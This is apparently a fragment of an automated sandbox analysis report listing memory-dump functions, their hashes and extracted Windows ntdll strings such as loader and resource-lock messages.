                                                              • Opcode ID: 304b38a131ad47a36fac6bf3a1cfd8987b698562aa46774eb90a31731ac62720
                                                              • Instruction ID: 87d3f0a8ef6e70da46de8a9f62b451db462efc6489ae12269e890c9b2060cb10
                                                              • Opcode Fuzzy Hash: 304b38a131ad47a36fac6bf3a1cfd8987b698562aa46774eb90a31731ac62720
                                                              • Instruction Fuzzy Hash: 0C51F4717087019FE714DF28C881F19F7BDBB8427CF040A6DE8969B291DB74A809DB91
                                                              APIs
                                                              Strings
                                                              • LdrpInitializePerUserWindowsDirectory, xrefs: 359B82DE
                                                              • Failed to reallocate the system dirs string !, xrefs: 359B82D7
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 359B82E8
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 3446177414-1783798831
                                                              • Opcode ID: af3178a3c5b1c1550f27b5dbfadbeddce5f985dc2ed1d32bb81c45f62694538c
                                                              • Instruction ID: d10436c2e7fdda4f9bc463f13843393dfa01533de1cf75a815cb9cadf7290d87
                                                              • Opcode Fuzzy Hash: af3178a3c5b1c1550f27b5dbfadbeddce5f985dc2ed1d32bb81c45f62694538c
                                                              • Instruction Fuzzy Hash: 6B41EFB5618304EBDB10DB68DC40B4B77F8BF486A4F05096AF948E7251EF70E8029B91
                                                              Strings
                                                              • RTL: Resource at %p, xrefs: 359B7B8E
                                                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 359B7B7F
                                                              • RTL: Re-Waiting, xrefs: 359B7BAC
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                              • API String ID: 0-871070163
                                                              • Opcode ID: b4e27991281694ebbf5c01a9ca0ff4dd018717e57b1b02dccf787c0156ace925
                                                              • Instruction ID: e9676c11d78a97be6d1162ac20238efc5d622a5553ba2e2fdbc0bf6bb30a3083
                                                              • Opcode Fuzzy Hash: b4e27991281694ebbf5c01a9ca0ff4dd018717e57b1b02dccf787c0156ace925
                                                              • Instruction Fuzzy Hash: F541CF357047069FE710DE25CC40B5AB7EAFF88710F000A5EE95A9B281EB71E5058F91
                                                              APIs
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 359B728C
                                                              Strings
                                                              • RTL: Resource at %p, xrefs: 359B72A3
                                                              • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 359B7294
                                                              • RTL: Re-Waiting, xrefs: 359B72C1
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                              • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                              • API String ID: 885266447-605551621
                                                              • Opcode ID: 5cc1dde2690671dd5b1b891388a0eed85ada793a63428a44d9cf10e36f92305d
                                                              • Instruction ID: 4d5d851ae244f7be210cb09ede13f0c07840df0b6a28b47db9fb72e616d5f0f9
                                                              • Opcode Fuzzy Hash: 5cc1dde2690671dd5b1b891388a0eed85ada793a63428a44d9cf10e36f92305d
                                                              • Instruction Fuzzy Hash: 3B419A35B04206ABEB11CF25CC41F5AB7AAFF84750F10065AF955AB280EB61E856CBD1
                                                              APIs
                                                              Strings
                                                              • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 359C4888
                                                              • LdrpCheckRedirection, xrefs: 359C488F
                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 359C4899
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                              • API String ID: 3446177414-3154609507
                                                              • Opcode ID: e70caf70cac845006b43b8c26514aa71fc85213527a8db06e689c987eef053bf
                                                              • Instruction ID: 2732a8f1b17add6b843a2ba1712439dab00611a4b2b1cf8dfd63f15fdcd8aff6
                                                              • Opcode Fuzzy Hash: e70caf70cac845006b43b8c26514aa71fc85213527a8db06e689c987eef053bf
                                                              • Instruction Fuzzy Hash: 8B41AF76B08351CFDB11CE58D840A167BE9BB89692F060599EC4EA7251D724E801CB92
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: %%%u$]:%u
                                                              • API String ID: 48624451-3050659472
                                                              • Opcode ID: bb0a2bc524f8b38700ff5ec97adca74d567c59ec74ef7ccafb9866cbff96a92e
                                                              • Instruction ID: 0a8dcec3d00c50bf4984a5b798b4a3a8b091002b2042cf10f3e49a41e90dcf34
                                                              • Opcode Fuzzy Hash: bb0a2bc524f8b38700ff5ec97adca74d567c59ec74ef7ccafb9866cbff96a92e
                                                              • Instruction Fuzzy Hash: A63182B6A006199FDB10CE29CC40BEE77BCFB44651F854596E849E7200EB71EA458FA0
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID: Wow64 Emulation Layer
                                                              • API String ID: 3446177414-921169906
                                                              • Opcode ID: d8cff3520e50794bde504bebcceeba19ba2d61de6d1196079e292ad77383d6a5
                                                              • Instruction ID: ac562d8d9e1ca02072e893ffd802e6073ca25af62bc09645dc1778dc03cff0ee
                                                              • Opcode Fuzzy Hash: d8cff3520e50794bde504bebcceeba19ba2d61de6d1196079e292ad77383d6a5
                                                              • Instruction Fuzzy Hash: 9E21FE75A0425DBFAB01DAA0DD84DBF7B7DEF842D8B0504A4FE15A2140D730AF15EB61
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID:
                                                              • API String ID: 3446177414-0
                                                              • Opcode ID: 2a722035578619f7a0edd96fe4c16488c50f9187a9c5726e376e90c3bf8383e6
                                                              • Instruction ID: 582c57373b3673bffd9c7a5f2711e8c07be01fb29a23ec6479e9f63f7d12ff8c
                                                              • Opcode Fuzzy Hash: 2a722035578619f7a0edd96fe4c16488c50f9187a9c5726e376e90c3bf8383e6
                                                              • Instruction Fuzzy Hash: E9E15E71E0430EABDB15CFA4C885FAEBBB9BF04355F10812AED15EB280D774AA45DB50
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4068fdcd6728cc5716db2a1c048857e4fbee3200f89baad8c32ded8f251c7e79
                                                              • Instruction ID: f4b5fe3a0947a7167c4137b56c2e8fa6814cf124a74f2b2e65cd2be6d4df3af1
                                                              • Opcode Fuzzy Hash: 4068fdcd6728cc5716db2a1c048857e4fbee3200f89baad8c32ded8f251c7e79
                                                              • Instruction Fuzzy Hash: 39E10275E04708DFDB21CFA9C980A8DBBF6FF48368F20456AE446A7265DB70A845CF10
                                                              APIs
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID:
                                                              • API String ID: 3446177414-0
                                                              APIs
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID:
                                                              • API String ID: 3446177414-0
                                                              APIs
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID:
                                                              • API String ID: 3446177414-0
                                                              APIs
                                                              Similarity
                                                              • API ID: DebugPrintTimes$BaseInitThreadThunk
                                                              • String ID:
                                                              • API String ID: 4281723722-0
                                                              Strings
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @
                                                              • API String ID: 0-2766056989
                                                              APIs
                                                              Strings
                                                              Similarity
                                                              • API ID: __aulldvrm
                                                              • String ID: +$-
                                                              • API String ID: 1302938615-2137968064
                                                              Strings
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 0$Flst
                                                              • API String ID: 0-758220159
                                                              APIs
                                                              Strings
                                                              • kLsE, xrefs: 35940540
                                                              • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 3594063D
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                              • API String ID: 3446177414-2547482624
                                                              APIs
                                                              Strings
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID: 0$0
                                                              • API String ID: 3446177414-203156872